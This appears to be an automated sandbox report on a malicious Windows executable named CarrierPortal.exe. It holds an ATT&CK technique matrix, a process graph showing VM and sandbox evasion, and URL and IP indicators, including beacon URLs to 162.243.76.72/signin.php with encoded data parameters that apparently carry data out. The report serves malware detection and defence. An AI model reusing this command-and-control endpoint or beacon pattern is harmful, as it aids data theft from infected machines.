ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts231
Windows Management Instrumentation		1
LSASS Driver		11
Process Injection		1
Masquerading		1
Input Capture		1
Query Registry		Remote Services1
Input Capture		1
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts2
Command and Scripting Interpreter		1
DLL Side-Loading		1
LSASS Driver		251
Virtualization/Sandbox Evasion		LSASS Memory331
Security Software Discovery		Remote Desktop Protocol1
Archive Collected Data		1
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
DLL Side-Loading		11
Process Injection		Security Account Manager1
Process Discovery		SMB/Windows Admin SharesData from Network Shared Drive1
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Obfuscated Files or Information		NTDS251
Virtualization/Sandbox Evasion		Distributed Component Object ModelInput Capture1
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
DLL Side-Loading		LSA Secrets1
Application Window Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials2
File and Directory Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync133
System Information Discovery		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 process2 2 Behavior Graph ID: 1584233 Sample: CarrierPortal.exe Startdate: 04/01/2025 Architecture: WINDOWS Score: 45 7 CarrierPortal.exe 14 2->7         started        10 powershell.exe 19 2->10         started        13 Taskmgr.exe 2->13         started        15 3 other processes 2->15 dnsIp3 35 162.243.76.72, 49713, 49748, 80 DIGITALOCEAN-ASNUS United States 7->35 17 cmd.exe 1 7->17         started        43 Loading BitLocker PowerShell Module 10->43 19 CarrierPortal.exe 5 10->19         started        21 conhost.exe 1 10->21         started        45 Monitors registry run keys for changes 13->45 signatures4 process5 process6 23 dxdiag.exe 99 11 17->23         started        26 conhost.exe 17->26         started        28 cmd.exe 19->28         started        signatures7 37 Query firmware table information (likely to detect VMs) 23->37 39 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 23->39 41 Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes) 23->41 30 dxdiag.exe 28->30         started        33 conhost.exe 28->33         started        process8 signatures9 47 Query firmware table information (likely to detect VMs) 30->47

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
CarrierPortal.exe0%ReversingLabs
CarrierPortal.exe0%VirustotalBrowse

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://go.mtH0%Avira URL Cloudsafe
https://www.graalvm.org/dev/reference-manual/native-image/dynamic-features/CertificateManagement/#ru0%Avira URL Cloudsafe
https://www.graalvm.org/0%Avira URL Cloudsafe
https://www.graalvm.org/latest/reference-manual/native-image/metadata/#resources-and-resource-bundle0%Avira URL Cloudsafe
http://www.quovadis.bmB0%Avira URL Cloudsafe
http://cps.chambersign.org/cps/chambersroot.html)_0%Avira URL Cloudsafe
https://www.graalvm.org/latest/reference-manual/native-image/metadata/#serialization0%Avira URL Cloudsafe
https://ocsp.quovadisoffshore.com90%Avira URL Cloudsafe
http://policy.camerfirma.com3b0%Avira URL Cloudsafe
https://repository.luxtrust.lu#0%Avira URL Cloudsafe
http://162.243.76.72/signin.php0%Avira URL Cloudsafe
https://www.graalvm.org/latest/reference-manual/native-image/metadata/#g0%Avira URL Cloudsafe
https://www.graalvm.org/latest/reference-manual/native-image/metadata/#0%Avira URL Cloudsafe
http://go.microsoft.c7H0%Avira URL Cloudsafe
http://162.243.76.72/signin.php?form=form&post=PT1RTXlWR2JzRkdkejVXUw%3D%3D&data=PW93VktSa1l4QVhNU1ZUVDZsVk5HVlVaT1pVUmo5bVN5WWxVS3BHVkNKRVNTQkZlSFYyVk8xV1RYeDJNWmgzWnVGbVdrWlVaM2htVlNkRVp6a2xSS1pVWXJSMmFTcG1VeElWTnZkMVZZaDJNWmRGWnJaRk1PMW1VelFYVlVWRmJ3MFVUd2RWVXhFRE1SQnpaekVsYnhRRlVLUTBNbFEwTWxFRlZWWlVWbHB3VmtWa1l3QVhNVk5rV3VkRmNLVlVUb1JXUmlaRGJGTjFTNEpUV0l4R1ZsdG1Vd0ltYnhBVFYwRUVSVVpEYndRbVR3ZGxWNnhXUlNaa1Q2UlZjR1ZrVFFCM1ZUUmpUd0VXTmo1MlZaQlhSaHRHWkZKV013WlZaREpsVmFsVk5GMVVZa1pVVHlzMmFTdG1RdWxGZEt4R1pyNUVWVTVXTUZabFFrZGxWSkIzYWtwa1VWZDFkM0JqVkxKRVNhUmtSd0ltVFNaVlV4RURNUk5EWlhWVmRhWjBZcFJXVlY1V01GWmxjazVHVkZabFJqcGtUd29GTjVVa1ZDSkVWVVJsVnExa1c0ZDFUMUFYTVdSRGVYZFZXMVVrWU5CM1ZTRkRNRlpsU2s1R1Z3SkVSbDlrVVZGVmV6VlZWM0ZUVlhobFZxSjJha3htVTFCblJXWkhadFZGV1dwbVlwUldSaVpqUnlFbFE1Y2xWMHBGYmloR1pXOVVNc0ZqVnpRMlZXbFhXRzEwYWtWa1l4QUhibFpIWnRWRldXcG1ZcFJXUmlaalJ5RWxjMFZsVkpCM2FrcGxTcVpsTk8xV1QxczJNVUJuU3JOVmExMFdWenBrTVI5bVR4TUZWS1ZrVXA1a2FUTkhkckoxVTFBelVWeEdNYUpsUnFGMVZzVmtVYXBFVlVWa1J3b2xVT1ZWVTFnM2FoSkZaWU5sUlNkMVVzeDJWUlpYTndFMVFTVmxWSHBGYmx4a1R4UW1iYTFXWUtaRldVWmtVWE5GYmtkMFlQQlhNV2hYV3prVmQwMW1US0pGTWFSVE9GWjFTMVVWVndwRU1WSmxWRzFFVEd4V1RIeG1iWFJrU1ZSbVdrWlZUemxUVmhOVU5WbEZXMVVWWnA1a2FVSkRjc0ptVWtkVlYwcDFhbGhHWldSbGJLRmpVekIzTVpoRWFJRkdiT3hXVURCWE1TZEVaSXBGU2FaVlpFUlhiVWhYVHRKMlM0MVdXMVpVTWFWRlpXOWtjd1prVjJSMlZVVkZiRjVrVE90V1V3c1dSU1pFWllSVmNHRmpXTUpWVlVWRGJ3STFTQ2hrV0VSbk1heGtVVmQxZE5aMFUySjBNUjVXTVVCbENFTlRKRU5USlJkVmVaQnpZb3BsUlBaVE1yRm1RV3BHVkZCSGJhNWtVV05sZTN0V1lDWkZXVVJrVUVWR2JzVm5i0%Avira URL Cloudsafe
https://ocsp.quovadisoffshore.com(0%Avira URL Cloudsafe
http://repository.swisssign.com/YF0%Avira URL Cloudsafe
http://go.microsoft.co0%Avira URL Cloudsafe
http://162.243.76.72/signin.php?0%Avira URL Cloudsafe
https://repository.luxtrust.luc0%Avira URL Cloudsafe
https://repository.luxtrust.luYa0%Avira URL Cloudsafe
http://162.243.76.72/signin.php?form=form&post=PT1RTXlWR2JzRkdkejVXUw%3D%3D&data=PW93VktSa1l4QVhNU1Z0%Avira URL Cloudsafe
http://162.243.76.72/signin.php?form=form&post=0%Avira URL Cloudsafe
http://cps.chambersign.org/cps/chambersroot.htmlax0%Avira URL Cloudsafe
http://162.243.76.72/signin.php?form=form&post=PT1RTXlWR2JzRkdkejVXUw%3D%3D&data=PW93VktSa1l4QVhNU1ZUVDZsVk5HVlVaT1pVUmo5bVN5WWxVS3BHVkNKRVNTQkZlSFYyVk8xV1RYeDJNWmgzWnVGbVdrWlVaM2htVlNkRVp6a2xSS1pVWXJSMmFTcG1VeElWTnZkMVZZaDJNWmRGWnJaRk1PMW1VelFYVlVWRmJ3MFVUd2RWVXhFRE1SQnpaekVsYnhRRlVLUTBNbFEwTWxFRlZWWjBhTnB3VmtWa1l3QVhNVk5rV3VkRmNLVlVUb1JXUmlaRGJGTjFTNEpUV0l4R1ZsdG1Vd0ltYnhBVFYwRUVSVVpEYndRbVR3ZGxWNnhXUlNaa1Q2UlZjR0JUVFFCM1ZUQlRUd0VXTmo1MlZaQlhSaHRHWkZKV013WlZaREpsVmFsVk5GMVVZa1pVVHlzMmFTdG1RdWxGZEt4R1pyNUVWVTVXTUZabFFrZGxWSkIzYWtwa1VWZDFkM0JqVkxKRVNhUmtSd0ltVFNaVlV4RURNUk5EWlhWVmRhWjBZcFJXVlY1V01GWmxjazVHVkZabFJqcGtUd29GTjVVa1ZDSkVWVVJsVnExa1c0ZDFUMUFYTVdSRGVYZFZXMVVrWU5CM1ZTRkRNRlpsU2s1R1Z3SkVSbDlrVVZGVmV6VlZWM0ZUVlhobFZxSjJha3htVTFCblJXWkhadFZGV1dwbVlwUldSaVpqUnlFbFE1Y2xWMHBGYmloR1pXOVVNc0ZqVnpRMlZXbFhXRzEwYWtWa1l4QUhibFpIWnRWRldXcG1ZcFJXUmlaalJ5RWxjMFZsVkpCM2FrcGxTcVpsTk8xV1QxczJNVUJuU3JOVmExMFdWenBrTVI5bVR4TUZWS1ZrVXA1a2FUTkhkckoxVTFBelVWeEdNYUpsUnFGMVZzVmtVYXBFVlVWa1J3b2xVT1ZWVTFnM2FoSkZaWU5sUlNkMVVzeDJWUlpYTndFMVFTVmxWSHBGYmx4a1R4UW1iYTFXWUtaRldVWmtVWE5GYmtkMFlQQlhNV2hYV3prVmQwMW1US0pGTWFSVE9GWjFTMVVWVndwRU1WSmxWRzFFVEd4V1RIeG1iWFJrU1ZSbVdrWlZUemxUVmhOVU5WbEZXMVVWWnA1a2FVSkRjc0ptVWtkVlYwcDFhbGhHWldSbGJLRmpVekIzTVpoRWFJRkdiT3hXVURCWE1TZEVaSXBGU2FaVlpFUlhiVWhYVHRKMlM0MVdXMVpVTWFWRlpXOWtjd1prVjJSMlZVVkZiRjVrVE90V1V3c1dSU1pFWllSVmNHRmpXTUpWVlVWRGJ3STFTQ2hrV0VSbk1heGtVVmQxZE5aMFUySjBNUjVXTVVCbENFTlRKRU5USlJkVmVaQnpZb3BsUlBaVE1yRm1RV3BHVkZCSGJhNWtVV05sZTN0V1lDWkZXVVJrVUVWR2JzVm5i0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

No contacted domains info

Contacted URLs

NameMaliciousAntivirus DetectionReputation
http://162.243.76.72/signin.php?form=form&post=PT1RTXlWR2JzRkdkejVXUw%3D%3D&data=PW93VktSa1l4QVhNU1ZUVDZsVk5HVlVaT1pVUmo5bVN5WWxVS3BHVkNKRVNTQkZlSFYyVk8xV1RYeDJNWmgzWnVGbVdrWlVaM2htVlNkRVp6a2xSS1pVWXJSMmFTcG1VeElWTnZkMVZZaDJNWmRGWnJaRk1PMW1VelFYVlVWRmJ3MFVUd2RWVXhFRE1SQnpaekVsYnhRRlVLUTBNbFEwTWxFRlZWWlVWbHB3VmtWa1l3QVhNVk5rV3VkRmNLVlVUb1JXUmlaRGJGTjFTNEpUV0l4R1ZsdG1Vd0ltYnhBVFYwRUVSVVpEYndRbVR3ZGxWNnhXUlNaa1Q2UlZjR1ZrVFFCM1ZUUmpUd0VXTmo1MlZaQlhSaHRHWkZKV013WlZaREpsVmFsVk5GMVVZa1pVVHlzMmFTdG1RdWxGZEt4R1pyNUVWVTVXTUZabFFrZGxWSkIzYWtwa1VWZDFkM0JqVkxKRVNhUmtSd0ltVFNaVlV4RURNUk5EWlhWVmRhWjBZcFJXVlY1V01GWmxjazVHVkZabFJqcGtUd29GTjVVa1ZDSkVWVVJsVnExa1c0ZDFUMUFYTVdSRGVYZFZXMVVrWU5CM1ZTRkRNRlpsU2s1R1Z3SkVSbDlrVVZGVmV6VlZWM0ZUVlhobFZxSjJha3htVTFCblJXWkhadFZGV1dwbVlwUldSaVpqUnlFbFE1Y2xWMHBGYmloR1pXOVVNc0ZqVnpRMlZXbFhXRzEwYWtWa1l4QUhibFpIWnRWRldXcG1ZcFJXUmlaalJ5RWxjMFZsVkpCM2FrcGxTcVpsTk8xV1QxczJNVUJuU3JOVmExMFdWenBrTVI5bVR4TUZWS1ZrVXA1a2FUTkhkckoxVTFBelVWeEdNYUpsUnFGMVZzVmtVYXBFVlVWa1J3b2xVT1ZWVTFnM2FoSkZaWU5sUlNkMVVzeDJWUlpYTndFMVFTVmxWSHBGYmx4a1R4UW1iYTFXWUtaRldVWmtVWE5GYmtkMFlQQlhNV2hYV3prVmQwMW1US0pGTWFSVE9GWjFTMVVWVndwRU1WSmxWRzFFVEd4V1RIeG1iWFJrU1ZSbVdrWlZUemxUVmhOVU5WbEZXMVVWWnA1a2FVSkRjc0ptVWtkVlYwcDFhbGhHWldSbGJLRmpVekIzTVpoRWFJRkdiT3hXVURCWE1TZEVaSXBGU2FaVlpFUlhiVWhYVHRKMlM0MVdXMVpVTWFWRlpXOWtjd1prVjJSMlZVVkZiRjVrVE90V1V3c1dSU1pFWllSVmNHRmpXTUpWVlVWRGJ3STFTQ2hrV0VSbk1heGtVVmQxZE5aMFUySjBNUjVXTVVCbENFTlRKRU5USlJkVmVaQnpZb3BsUlBaVE1yRm1RV3BHVkZCSGJhNWtVV05sZTN0V1lDWkZXVVJrVUVWR2JzVm5ifalse
  • Avira URL Cloud: safe
unknown
http://162.243.76.72/signin.php?form=form&post=PT1RTXlWR2JzRkdkejVXUw%3D%3D&data=PW93VktSa1l4QVhNU1ZUVDZsVk5HVlVaT1pVUmo5bVN5WWxVS3BHVkNKRVNTQkZlSFYyVk8xV1RYeDJNWmgzWnVGbVdrWlVaM2htVlNkRVp6a2xSS1pVWXJSMmFTcG1VeElWTnZkMVZZaDJNWmRGWnJaRk1PMW1VelFYVlVWRmJ3MFVUd2RWVXhFRE1SQnpaekVsYnhRRlVLUTBNbFEwTWxFRlZWWjBhTnB3VmtWa1l3QVhNVk5rV3VkRmNLVlVUb1JXUmlaRGJGTjFTNEpUV0l4R1ZsdG1Vd0ltYnhBVFYwRUVSVVpEYndRbVR3ZGxWNnhXUlNaa1Q2UlZjR0JUVFFCM1ZUQlRUd0VXTmo1MlZaQlhSaHRHWkZKV013WlZaREpsVmFsVk5GMVVZa1pVVHlzMmFTdG1RdWxGZEt4R1pyNUVWVTVXTUZabFFrZGxWSkIzYWtwa1VWZDFkM0JqVkxKRVNhUmtSd0ltVFNaVlV4RURNUk5EWlhWVmRhWjBZcFJXVlY1V01GWmxjazVHVkZabFJqcGtUd29GTjVVa1ZDSkVWVVJsVnExa1c0ZDFUMUFYTVdSRGVYZFZXMVVrWU5CM1ZTRkRNRlpsU2s1R1Z3SkVSbDlrVVZGVmV6VlZWM0ZUVlhobFZxSjJha3htVTFCblJXWkhadFZGV1dwbVlwUldSaVpqUnlFbFE1Y2xWMHBGYmloR1pXOVVNc0ZqVnpRMlZXbFhXRzEwYWtWa1l4QUhibFpIWnRWRldXcG1ZcFJXUmlaalJ5RWxjMFZsVkpCM2FrcGxTcVpsTk8xV1QxczJNVUJuU3JOVmExMFdWenBrTVI5bVR4TUZWS1ZrVXA1a2FUTkhkckoxVTFBelVWeEdNYUpsUnFGMVZzVmtVYXBFVlVWa1J3b2xVT1ZWVTFnM2FoSkZaWU5sUlNkMVVzeDJWUlpYTndFMVFTVmxWSHBGYmx4a1R4UW1iYTFXWUtaRldVWmtVWE5GYmtkMFlQQlhNV2hYV3prVmQwMW1US0pGTWFSVE9GWjFTMVVWVndwRU1WSmxWRzFFVEd4V1RIeG1iWFJrU1ZSbVdrWlZUemxUVmhOVU5WbEZXMVVWWnA1a2FVSkRjc0ptVWtkVlYwcDFhbGhHWldSbGJLRmpVekIzTVpoRWFJRkdiT3hXVURCWE1TZEVaSXBGU2FaVlpFUlhiVWhYVHRKMlM0MVdXMVpVTWFWRlpXOWtjd1prVjJSMlZVVkZiRjVrVE90V1V3c1dSU1pFWllSVmNHRmpXTUpWVlVWRGJ3STFTQ2hrV0VSbk1heGtVVmQxZE5aMFUySjBNUjVXTVVCbENFTlRKRU5USlJkVmVaQnpZb3BsUlBaVE1yRm1RV3BHVkZCSGJhNWtVV05sZTN0V1lDWkZXVVJrVUVWR2JzVm5ifalse
  • Avira URL Cloud: safe
unknown

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
http://www.quovadis.bmBCarrierPortal.exe, 00000000.00000000.1185498132.00007FF68FC72000.00000008.00000001.01000000.00000003.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://crl.securetrust.com/STCA.crlECarrierPortal.exefalse
    		high
    http://go.mtHTaskmgr.exe, 00000019.00000003.1931402610.0000025B1CDEF000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    		unknown
    https://www.graalvm.org/CarrierPortal.exefalse
    • Avira URL Cloud: safe
    		unknown
    http://cps.chambersign.org/cps/chambersroot.html)_CarrierPortal.exe, 00000000.00000000.1185498132.00007FF68FC72000.00000008.00000001.01000000.00000003.sdmpfalse
    • Avira URL Cloud: safe
    		unknown
    http://crl.chambersign.org/chambersroot.crl0CarrierPortal.exe, 00000000.00000000.1185498132.00007FF68FC72000.00000008.00000001.01000000.00000003.sdmpfalse
      		high
      https://www.graalvm.org/dev/reference-manual/native-image/dynamic-features/CertificateManagement/#ruCarrierPortal.exefalse
      • Avira URL Cloud: safe
      		unknown
      https://www.graalvm.org/latest/reference-manual/native-image/metadata/#serializationCarrierPortal.exefalse
      • Avira URL Cloud: safe
      		unknown
      https://repository.luxtrust.lu0CarrierPortal.exe, 00000000.00000000.1185498132.00007FF68FC72000.00000008.00000001.01000000.00000003.sdmpfalse
        		high
        https://ocsp.quovadisoffshore.com9CarrierPortal.exefalse
        • Avira URL Cloud: safe
        		unknown
        http://cps.chambersign.org/cps/chambersroot.html0CarrierPortal.exe, 00000000.00000000.1185498132.00007FF68FC72000.00000008.00000001.01000000.00000003.sdmpfalse
          		high
          http://crl.dhimyotis.com/certignarootca.crl0CarrierPortal.exe, 00000000.00000000.1185498132.00007FF68FC72000.00000008.00000001.01000000.00000003.sdmpfalse
            		high
            http://policy.camerfirma.com3bCarrierPortal.exe, 00000000.00000000.1185498132.00007FF68FC72000.00000008.00000001.01000000.00000003.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://www.graalvm.org/latest/reference-manual/native-image/metadata/#resources-and-resource-bundleCarrierPortal.exefalse
            • Avira URL Cloud: safe
            		unknown
            http://www.chambersign.org1CarrierPortal.exe, 00000000.00000000.1185498132.00007FF68FC72000.00000008.00000001.01000000.00000003.sdmpfalse
              		high
              http://repository.swisssign.com/0CarrierPortal.exe, 00000000.00000000.1185498132.00007FF68FC72000.00000008.00000001.01000000.00000003.sdmpfalse
                		high
                http://policy.camerfirma.comCarrierPortal.exe, 00000000.00000000.1185498132.00007FF68FC72000.00000008.00000001.01000000.00000003.sdmpfalse
                  		high
                  https://repository.luxtrust.lu#CarrierPortal.exe, 00000000.00000000.1185498132.00007FF68FC72000.00000008.00000001.01000000.00000003.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://162.243.76.72/signin.phpCarrierPortal.exe, CarrierPortal.exe, 00000012.00000002.1830734275.000001E77811D000.00000004.00001000.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://go.microsTaskmgr.exe, 00000019.00000003.1931402610.0000025B1CDEF000.00000004.00000020.00020000.00000000.sdmpfalse
                    		high
                    https://ocsp.quovadisoffshore.comCarrierPortal.exefalse
                      		high
                      http://crl.securetrust.com/STCA.crl0CarrierPortal.exe, 00000000.00000000.1185498132.00007FF68FC72000.00000008.00000001.01000000.00000003.sdmpfalse
                        		high
                        https://www.graalvm.org/latest/reference-manual/native-image/metadata/#gCarrierPortal.exefalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://repository.luxtrust.luCarrierPortal.exe, 00000000.00000000.1185498132.00007FF68FC72000.00000008.00000001.01000000.00000003.sdmpfalse
                          		high
                          http://www.quovadisglobal.com/cps0CarrierPortal.exe, 00000000.00000000.1185498132.00007FF68FC72000.00000008.00000001.01000000.00000003.sdmpfalse
                            		high
                            http://repository.swisssign.com/YFCarrierPortal.exe, 00000000.00000000.1185498132.00007FF68FC72000.00000008.00000001.01000000.00000003.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://crl.dhimyotis.com/certignarootca.crlCarrierPortal.exefalse
                              		high
                              http://go.microsoft.c7HTaskmgr.exe, 00000019.00000003.1931402610.0000025B1CDEF000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://ocsp.quovadisoffshore.com0CarrierPortal.exe, 00000000.00000000.1185498132.00007FF68FC72000.00000008.00000001.01000000.00000003.sdmpfalse
                                		high
                                https://www.graalvm.org/latest/reference-manual/native-image/metadata/#CarrierPortal.exefalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://repository.swisssign.com/CarrierPortal.exe, 00000000.00000000.1185498132.00007FF68FC72000.00000008.00000001.01000000.00000003.sdmpfalse
                                  		high
                                  http://www.chambersign.orgCarrierPortal.exefalse
                                    		high
                                    http://policy.camerfirma.com0CarrierPortal.exe, 00000000.00000000.1185498132.00007FF68FC72000.00000008.00000001.01000000.00000003.sdmpfalse
                                      		high
                                      https://ocsp.quovadisoffshore.com(CarrierPortal.exe, 00000000.00000000.1185498132.00007FF68FC72000.00000008.00000001.01000000.00000003.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://go.microsoft.coTaskmgr.exe, 00000019.00000003.1931402610.0000025B1CDEF000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://crl.certigna.fr/certignarootca.crlCarrierPortal.exefalse
                                        		high
                                        http://crl.xrampsecurity.com/XGCA.crlCarrierPortal.exefalse
                                          		high
                                          http://crl.securetrust.com/STCA.crl;_CarrierPortal.exe, 00000000.00000000.1185498132.00007FF68FC72000.00000008.00000001.01000000.00000003.sdmpfalse
                                            		high
                                            https://wwww.certigna.fr/autorites/0mCarrierPortal.exe, 00000000.00000000.1185498132.00007FF68FC72000.00000008.00000001.01000000.00000003.sdmpfalse
                                              		high
                                              http://162.243.76.72/signin.php?CarrierPortal.exe, 00000012.00000002.1830734275.000001E77811D000.00000004.00001000.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://wwww.certigna.fr/autorites/CarrierPortal.exe, 00000000.00000000.1185498132.00007FF68FC72000.00000008.00000001.01000000.00000003.sdmpfalse
                                                		high
                                                https://repository.luxtrust.lucCarrierPortal.exe, 00000000.00000000.1185498132.00007FF68FC72000.00000008.00000001.01000000.00000003.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.quovadisglobal.com/cpsCarrierPortal.exe, 00000000.00000000.1185498132.00007FF68FC72000.00000008.00000001.01000000.00000003.sdmpfalse
                                                  		high
                                                  http://cps.chambersign.org/cps/chambersroot.htmlCarrierPortal.exe, 00000000.00000000.1185498132.00007FF68FC72000.00000008.00000001.01000000.00000003.sdmpfalse
                                                    		high
                                                    http://crl.securetrust.com/STCA.crlCarrierPortal.exefalse
                                                      		high
                                                      http://cps.chambersign.org/cps/chambersroot.htmlaxCarrierPortal.exe, 00000000.00000000.1185498132.00007FF68FC72000.00000008.00000001.01000000.00000003.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://crl.xrampsecurity.com/XGCA.crl0CarrierPortal.exe, 00000000.00000000.1185498132.00007FF68FC72000.00000008.00000001.01000000.00000003.sdmpfalse
                                                        		high
                                                        http://crl.certigna.fr/certignarootca.crl01CarrierPortal.exe, 00000000.00000000.1185498132.00007FF68FC72000.00000008.00000001.01000000.00000003.sdmpfalse
                                                          		high
                                                          http://crl.dhimyotis.com/certignarootca.crllWCarrierPortal.exe, 00000000.00000000.1185498132.00007FF68FC72000.00000008.00000001.01000000.00000003.sdmpfalse
                                                            		high
                                                            https://repository.luxtrust.luYaCarrierPortal.exe, 00000000.00000000.1185498132.00007FF68FC72000.00000008.00000001.01000000.00000003.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.quovadis.bmCarrierPortal.exe, 00000000.00000000.1185498132.00007FF68FC72000.00000008.00000001.01000000.00000003.sdmpfalse
                                                              		high
                                                              http://www.quovadis.bm0CarrierPortal.exe, 00000000.00000000.1185498132.00007FF68FC72000.00000008.00000001.01000000.00000003.sdmpfalse
                                                                		high
                                                                http://162.243.76.72/signin.php?form=form&post=PT1RTXlWR2JzRkdkejVXUw%3D%3D&data=PW93VktSa1l4QVhNU1ZCarrierPortal.exe, 00000012.00000002.1830734275.000001E77811D000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://162.243.76.72/signin.php?form=form&post=CarrierPortal.exefalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://crl.chambersign.org/chambersroot.crlCarrierPortal.exefalse
                                                                  		high

                                                                  World Map of Contacted IPs

                                                                  • No. of IPs < 25%
                                                                  • 25% < No. of IPs < 50%
                                                                  • 50% < No. of IPs < 75%
                                                                  • 75% < No. of IPs

                                                                  Public IPs

                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                  162.243.76.72
                                                                  		unknownUnited States
                                                                  		14061DIGITALOCEAN-ASNUSfalse

                                                                  General Information

                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                  Analysis ID:1584233
                                                                  Start date and time:2025-01-04 23:06:55 +01:00
                                                                  Joe Sandbox product:CloudBasic
                                                                  Overall analysis duration:0h 6m 15s
                                                                  Hypervisor based Inspection enabled:false
                                                                  Report type:full
                                                                  Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                  Number of analysed new started processes analysed:25
                                                                  Number of new started drivers analysed:2
                                                                  Number of existing processes analysed:0
                                                                  Number of existing drivers analysed:0
                                                                  Number of injected processes analysed:1
                                                                  Technologies:
                                                                  • HCA enabled
                                                                  • EGA enabled
                                                                  • AMSI enabled
                                                                  Analysis Mode:default
                                                                  Analysis stop reason:Timeout
                                                                  Sample name:CarrierPortal.exe
                                                                  Detection:MAL
                                                                  Classification:mal45.evad.winEXE@17/17@0/1
                                                                  EGA Information:Failed
                                                                  HCA Information:
                                                                  • Successful, ratio: 100%
                                                                  • Number of executed functions: 0
                                                                  • Number of non-executed functions: 2
                                                                  Cookbook Comments:
                                                                  • Found application associated with file extension: .exe

                                                                  Warnings

                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, consent.exe, SIHClient.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
                                                                  • Excluded IPs from analysis (whitelisted): 23.56.254.164, 172.202.163.200, 204.79.197.200, 23.1.33.206, 51.104.15.253, 204.79.197.222, 150.171.84.254, 13.107.213.254
                                                                  • Excluded domains from analysis (whitelisted): www.bing.com, fp.msedge.net, p-ring.msedge.net, fs.microsoft.com, slscr.update.microsoft.com, r.bing.com, t-ring.msedge.net, browser.pipe.aria.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                                  • Execution Graph export aborted for target CarrierPortal.exe, PID 1092 because there are no executed function
                                                                  • Execution Graph export aborted for target CarrierPortal.exe, PID 3012 because there are no executed function
                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                  • Report size getting too big, too many NtCreateKey calls found.
                                                                  • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                  • Report size getting too big, too many NtEnumerateKey calls found.
                                                                  • Report size getting too big, too many NtOpenKey calls found.
                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                  • Report size getting too big, too many NtReadVirtualMemory calls found.

                                                                  Simulations

                                                                  Behavior and APIs

                                                                  TimeTypeDescription
                                                                  17:08:00API Interceptor44x Sleep call for process: powershell.exe modified

                                                                  Joe Sandbox View / Context

                                                                  IPs

                                                                  No context

                                                                  Domains

                                                                  No context

                                                                  ASNs

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  DIGITALOCEAN-ASNUS1.elfGet hashmaliciousUnknownBrowse
                                                                  • 157.230.220.254
                                                                  1.elfGet hashmaliciousUnknownBrowse
                                                                  • 157.245.145.61
                                                                  fuckunix.spc.elfGet hashmaliciousMiraiBrowse
                                                                  • 104.131.84.158
                                                                  i686.elfGet hashmaliciousMiraiBrowse
                                                                  • 188.166.182.194
                                                                  2.elfGet hashmaliciousUnknownBrowse
                                                                  • 157.245.169.28
                                                                  3.elfGet hashmaliciousUnknownBrowse
